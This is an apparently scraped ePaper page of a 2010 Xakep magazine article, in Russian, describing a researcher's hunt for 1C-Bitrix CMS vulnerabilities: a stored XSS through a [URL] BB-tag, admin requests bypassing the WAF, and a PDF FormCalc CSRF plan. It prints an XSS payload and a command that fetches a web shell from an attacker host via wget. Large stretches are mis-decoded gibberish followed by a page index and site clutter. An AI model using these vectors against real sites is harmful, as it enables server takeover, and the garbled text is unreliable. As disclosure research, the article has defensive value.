JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online

More documents

Recommendations

Info

ВЗЛОМ Владимир d0znp Воронцов ONsec ÌÎËÎÒÊÎÌ ÏÎ ÁÈÒÐÈÊÑÓ! ÂÛßÂËßÅÌ 0DAY-ÓßÇÂÈÌÎÑÒÈ ÏÎÏÓËßÐÍÎÉ CMS Îêîëî ãîäà íàçàä ÿ íàøåë XSS-óÿçâèìîñòü â ïðîäóêòå 1Ñ-Áèòðèêñ, êîòîðóþ ïîêàçàë â ðîëèêå õàê-âèäåî íà CC09. Ïðîøåë ãîä, è ìíå ñòàëî èíòåðåñíî, ÷òî æå èçìåíèëîñü â ïðîäóêòå ñ òî÷êè çðåíèÿ áåçîïàñíîñòè? Íàïîìíþ, Áèòðèêñ — ïðîäóêò íåïðîñòîé, îí èìååò âñòðîåííûé ôèëüòð WAF, òî åñòü äëÿ ïðîâåäåíèÿ áîëüøèíñòâà àòàê ìàëî ïðîñòî íàéòè óÿçâèìîñòü, òðåáóåòñÿ åùå îáîéòè WAF. À îáîéòè åãî, ïîâåðü, î÷åíü íåëåãêî... ÏÐÅÄÛÑÒÎÐÈß Во время чтения множества статей по безопасности и описаний уязвимостей мне всегда становится интересно, какие действия исследователя предшествовали нахождению той или иной уязвимости. Интересно лишь с одной целью — понимать, какие шаги делал исследователь, какие попытки предпринимал, что не получилось, какие средства и утилиты он использовал. Выясняя все это, можно сильно расширить свой кругозор, а нередко и просто довести до ума какие-то незавершенные идеи. Кроме того, вводные части очень разбавляют технический текст и делают его интереснее. Как говорится, «хочешь сделать мир лучше — начни с себя», поэтому постараюсь описать весь процесс поиска уязвимостей как можно более подробно. А началось все с Форба, который как всегда ненавязчиво предложил написать образцовую статью на тему взлома CMS. На тот момент у меня была только одна заготовка — идея использования атрибута filesize для hijacking в Internet Explorer. Это была действительно сырая идея, хотя и пришлась по нраву Дэну Камински (seclists.org/fulldisclosure/2010/ Apr/288). В любом случае, на добротную статью этого явно не хватало. Пообещав Форбу ответить до вечера, я попробовал использование атрибута filesize в демо-версии Internet Explorer 9. Разработчики обещали поддержку формата SVG в тэге IMG, и, надеясь, что filesize будет определяться не только от SVG, но и от любого другого XML, можно было заюзать его для определения размера любых XML-ответов веб-приложения, что уже очень немало. Но, к сожалению, фортуна повернулась мягким местом, и filesize от XML всегда возвращал 0. Твердо решив написать новую и интересную статью, я стал просматривать веб-приложения, которые было бы интересно исследовать. Одним из первых в этом списке был 1С-Битрикс, на котором я и остановился. К слову, Битрикс — очень интересный движок, непростой, проверенный аудиторами, имеющий встроенные механизмы защиты от проведения атак. На эти механизмы есть сертификат по «соответствию требованиям Web Application Firewall Evaluation Criteria международной организации Web Application Security Consortium», кроме того, система имеет сертификат ФСТЭК по классу защиты от несанкционированного доступа. Так что исследование обещало быть интересным. Последний раз до этого я интенсивно изучал Битрикс версии 8.0.5 на CC09, где предлагалось обойти фильтр WAF, который препятствует проведению атак. На момент написания статьи актуальной версией была 9.0.3, которая, ко всему прочему, обзавелась новым механизмом защиты — «веб-антивирусом». Загрузив последнюю версию движка с официального сайта, я принялся за работу. ÏÅÐÂÛÉ ÁÀÃ — ÊÎËÎÌ! Первым делом я решил провести проверку системы ручным способом, просто щелкая по менюшкам и изучая функционал. Буквально сразу обратил 066 XÀÊÅÐ 09 /140/ 10
Хранимая XSS в [URL] тэге внимание на BB-тэги, которые можно было использовать во встроенном редакторе при написании сообщений на форум, блог или комментарии. Чтобы проверить, как BB превращаются в нормальные HTML-тэги, и что при этом фильтруется, я создал сообщение, куда поместил все тэги с разными спецсимволами, как в значениях, так и на месте атрибутов. Отправив такое сообщение на свой форум в Битриксе, я принялся рассматривать полученный HTML-код. Удивление пришло, когда кусок кода страницы в явном виде показал XSS. Это был самый банальный и самый изъезженный XSS при обработке: [URL=a' attribute='blabla']XSS[/URL] Ради спортивного интереса посмотрел на часы — прошло четыре минуты с начала «исследования». Оставив такой вектор атаки на потом, про себя заметил, что придется еще обходить фильтр WAF, который не пропустит наивные попытки записать атрибут onload, style, onmouseover и другие классические атрибуты при эксплуатации уязвимости. ÂÒÎÐÎÉ ÀÊÒ Продолжив бессистемное изучение функционала движка, я проверил еще несколько догадок, и все они оказались безуспешными. Кроме того, заметил странную особенность — при отправке запросов к системе от администратора, данные из них не фильтруются WAF. Сначала мне даже показалось, что «проактивная защита» просто не срабатывает. Недолго думая, я сразу написал письмо разработчикам Битрикс, которые очень заботятся о безопасности системы и всегда быстро отвечают на мои письма. Как разъяснили разработчики, запросы, посылаемые от администратора и содержащие дополнительный защитный параметр sessid, не фильтруются WAF. Это и логично — в системе ведь присутствуют администраторские утилиты выполнения SQLзапросов и PHP-кода, а если фильтровать их через WAF, они просто не будут работать. Стоп! Выполнение PHP-кода возможно сразу из админки, официально, ничего придумывать даже не надо, просто провести атаку CSRF, и вот он — веб-шелл! Таким образом, мне оставалось только обойти WAF, чтобы провести атаку типа «XSS+CSRF+WAF by pass» и получить веб-шелл. Настроение сильно улучшилось :). ÒÅÕÍÈ×ÅÑÊÀß PDFÅÐÆÊÀ Перебирая разные параметры в движке, я хотел было уже закончить поиски уязвимостей и перейти к изучению защиты WAF. Но тут очередь дошла до модуля «Техническая поддержка». Пользователю предоставлялась возможность создавать обращения к техперсоналу с описанием своих проблем. К каждому тикету можно прикрепить файл. Не задумываясь о последствиях, я создал новый тикет и прикрепил к нему произвольный файл, который по случаю оказался Хранимый HTML injection в поле ICQ PDF-документом. Затем перелогинился от администратора и посмотрел, что же отобразится в журнале заявок. Вся фильтрация работала на ура, но вот документ... Щелкнем по ссылке с документом — его контент отобразился плагином Adobe Acrobat прямо в браузере на домене подопытного Битрикса. Тут что-то щелкнуло в голове, и память (уже нейронная, а не оперативная) принесла информацию о том, что внутри PDF может содержаться исполнимый JavaScript. Все срасталось — браузер, cookies, нужный домен, JavaScript. Теперь уже вектор стал совершенно очевиден: надо научить PDF выполнять GET- и POST-запросы к серверу, тогда мы получаем CSRF в чистом виде, а затем, опять-таки, вебшелл. Здесь «проактивная защита» или WAF уже никак не помешает — ведь контент PDF-документа ей не по зубам. Спортивный интерес опять побудил посмотреть на часы — прошло три с половиной часа с начала работы. PDF CSRF EXPLOIT Теперь уже идея использовать PDF для проведения CSRF казалась более чем хорошей. Под атаку попадала масса веб-приложений и веб-сервисов. Стоило углубиться в документацию, методы создания PDF-документов и сделать пример «вредоносного» документа. Тут меня ждали две преграды. Во-первых, PDF поддерживает JavaScript лишь отчасти, и ни о каких HTTP-запросах речи здесь быть не может. Во-вторых, Adobe Acrobat имеет встроенный механизм защиты, который спрашивает подтверждения пользователя при взаимодействии документа с сетью. Бросать такую идею совершенно не хотелось, так что изучение документации продолжилось, и очень скоро принесло свои плоды. Обнаружилось, что помимо JavaScript в PDF-документах можно использовать второй язык — FormCalc. Google помог скачать полный список функций этого зверя: help.adobe.com/en_US/ livecycle/es/FormCalc.pdf. Самое вкусное, как всегда, оказалось в конце, и последний, десятый раздел мануала назывался коротко и ясно — «URL functions». Содержание раздела говорило само за себя — «Get, Post, Put». Теперь для проведения атаки необходимо было сделать PDF-документ, который бы реализовывал атаку по следующей схеме: 1. Отправка GET-запроса в админку по адресу targethost:6448/bitrix/admin/user_admin.php?lang=ru. 2. Обработка результата запроса, получение из него sessid. 3. Отправка POST-запроса с sessid и командой «wget http:// evilhost.ru/s.txt -O shell.php» по адресу targethost: 6448/ bitrix/admin/php_command_line.php?mode=frame&lang=ru. На языке FormCalc такой сценарий описывался тремя строчками кода: WARNING warning Вся информация приведена исключительно в образовательных целях. Ответственность за любые действия, совершенные с ее использованием несет только лицо, совершившее эти действия. INFO info Отправка запросов на домен, где расположен PDFдокумент, является документированной функцией Adobe Acrobat. Тем не менее, использование такого функцио нала дает злоумышленнику возможность проведения атак CSRF. Не встраивай PDF на страницы своих вебприложений — это опасно! XÀÊÅÐ 09 /140/ 10 067
Page 1:
CMS БИТРИКС: СВЕЖИЕ У
Page 4 and 5:
CONTENT MegaNews 004 Все нов
Page 6:
MEGANEWS МАРИЯ «MIFRILL» Н
Page 10:
MEGANEWS ÏÈÙÅÂÀß ÖÅÏÎ×
Page 13 and 14:
Реклама 11
Page 15 and 16:
ÆÈÄÊÎÑÒÍÎÅ ÎÕËÀÆÄÅ
Page 17 and 18: ÓÆÀÑ È ÏÀÍÈÊÀ — SKYPE
Page 19 and 20: ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒ
Page 21 and 22: 4500 ðóá. 11600 ðóá. 3Q 3QMMP
Page 24 and 25: FERRUM SEAGATE FREEAGENT Theater 35
Page 26 and 27: FERRUM Дмитрий Ленски
Page 28 and 29: PC_ZONE Александр Лозо
Page 30 and 31: PC_ZONE Перед сборкой
Page 32: PC_ZONE INFO info Если речь
Page 35 and 36: Моя первая разрабо
Page 37 and 38: У Poly-Poly Cannon было уже
Page 39 and 40: coding lotus.xakep.ru X-testing сo
Page 41 and 42: Сервисная утилита
Page 43 and 44: VID È PID ÍÅ ÈÇÂËÅÊÀÞÒ
Page 45 and 46: наша информация, та
Page 47 and 48: ¹ 6 РЕШЕНИЕ: ЗАДАЧА:
Page 50 and 51: ВЗЛОМ Алексей Синц
Page 52 and 53: ВЗЛОМ Ubuntu. Шаг 1 Ubuntu.
Page 54 and 55: ВЗЛОМ Clickjacking. Вроде
Page 58 and 59: ВЗЛОМ Статистика о
Page 60 and 61: ВЗЛОМ Леонид «Cr@wler»
Page 62 and 63: ВЗЛОМ Китайский ма
Page 64 and 65: ВЗЛОМ Баранов Арте
Page 66 and 67: ВЗЛОМ Команда !vad да
Page 70 and 71: ВЗЛОМ Пример XSS, най
Page 74 and 75: ВЗЛОМ 0xXXYY0104 — нача
Page 76 and 77: ВЗЛОМ Так выглядит
Page 78 and 79: ВЗЛОМ HellMilitia и my Death
Page 80 and 81: ВЗЛОМ Смещение фай
Page 82 and 83: ВЗЛОМ Маг icq 884888 X-TOOL
Page 84 and 85: MALWARE Вячеслав Закор
Page 86 and 87: MALWARE На этом первую
Page 88 and 89: MALWARE Александр Экке
Page 90: MALWARE невыявляем пут
Page 93 and 94: ËÀÁÎÐÀÒÎÐÈß Ñ ÄÐÓÃ
Page 95 and 96: достают через АНБ.
Page 97 and 98: Реклама
Page 99 and 100: Команда «qdbus org.kde.yaku
Page 101 and 102: ли, то не могу преду
Page 103 and 104: Antix LXDE + Ubuntu = Lubuntu 128
Page 105 and 106: Slitaz Åñòü ëè æèçíü â
Page 107 and 108: coding DVD Qt logo dvd На дис
Page 109 and 110: coding Наше приложени
Page 111 and 112: coding позволяющие оп
Page 113 and 114: coding Утилита ручной
Page 115 and 116: Особо чувствительн
Page 117 and 118: Реклама
Page 119 and 120:
îáíîâëåíèÿ — íàæàò
Page 121 and 122:
INFO info • Обзор Forefront
Page 123 and 124:
XSTARTER Åùå îäíà ïîïóë
Page 125 and 126:
INFO info • Все програм
Page 127 and 128:
Евгений Зобнин j1m@syn
Page 129 and 130:
Создаем виртуальны
Page 131 and 132:
Устанавливаем зону
Page 133 and 134:
Lite, Pro èëè Cluster. Ñïèñ
Page 135 and 136:
Â çàâèñèìîñòè îò âû
Page 137 and 138:
Во сне мы проводим
Page 139 and 140:
INFO info Подробнее об
Page 141 and 142:
ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•
Page 143 and 144:
Wi-Fi сканер, но наибо
Page 145 and 146:
CMS БИТРИКС: СВЕЖИЕ У
show all

JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?

JIT SPRAY ÃÂÃÂÃÂÃÂ›ÃÂ˜ÃÂ— TDSS - Xakep Online